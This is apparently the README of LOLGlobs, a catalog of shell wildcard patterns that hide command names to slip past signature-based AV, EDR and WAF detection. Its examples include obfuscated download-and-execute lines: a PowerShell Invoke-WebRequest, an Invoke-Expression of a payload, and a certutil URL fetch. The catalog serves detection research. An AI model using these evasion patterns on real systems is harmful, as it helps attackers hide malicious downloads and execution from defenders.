Process execution through wildcard pattern evasion
A searchable catalog of glob-based command obfuscation techniques for Linux, macOS, Windows CMD, and PowerShell. Using wildcards (*, ?, []) to launch processes without spelling out the full command name can bypass signature-based detection in AV, EDR, and WAF products.
Inspired by LOLBAS and GTFOBins.
Live site: https://0xv1n.github.io/LOLGlobs
Most shells expand glob patterns before executing commands. So w?oami resolves to whoami at the shell level — the literal string whoami never appears in the script:
w?oami # → whoami
w*i # → whoami
/???/???/w* # → /usr/bin/whoamiPowerShell works differently — wildcard resolution happens via Get-Command:
& (gcm I*oke-W*R*) -Uri http://... # → Invoke-WebRequest
& (gal ?e?) 'payload' # alias iex → Invoke-ExpressionWindows CMD doesn't expand globs in command position at all — use for /f + where instead:
for /f %i in ('where c*til.exe') do @%i -urlcache -f http://...| Platform | Entries |
|---|---|
| Linux (bash) | 21 |
| macOS (zsh) | 4 |
| Windows CMD | 8 |
| PowerShell | 10 |
Categories: discovery · download · execution · persistence · lateral-movement · exfiltration · reconnaissance · credential-access · encode-decode · compile · upload
Submit new entries via GitHub Issues using the structured form.
Create a file at _globs/<platform>/<command>.md:
---
Name: whoami
Description: "Prints the current username."
Platform: linux # linux | macos | windows-cmd | powershell
BinaryPath:
- /usr/bin/whoami
Category: discovery # see _data/categories.yml for full list
MitreID: T1033
Patterns:
- Pattern: "w?oami"
Wildcards: ["?"]
Notes: "Single char wildcard replaces 'h'"
- Pattern: "w*i"
Wildcards: ["*"]
Notes: "Star matches 'hoam'"
- Pattern: "/???/???/w*"
Wildcards: ["?", "*"]
Notes: "Full path obfuscation"
PlatformNotes: | # optional — platform-specific caveats
Any relevant notes here.
Resources:
- https://attack.mitre.org/techniques/T1033/
---- Legitimate system binary or built-in command
- At least 3 distinct glob patterns
- Patterns tested on the target platform
- MITRE ATT&CK technique ID where applicable
All entries are available as a machine-readable JSON array:
https://0xv1n.github.io/LOLGlobs/api/entries.json
Fields: name, description, platform, category, mitreId, binaryPath, patternCount, patterns, url
MIT © 2026 0xv1n
This project is for educational and defensive security purposes only. All documented techniques are intended to help defenders understand attacker methods and improve detection coverage. Use responsibly and only on systems you have explicit authorization to test.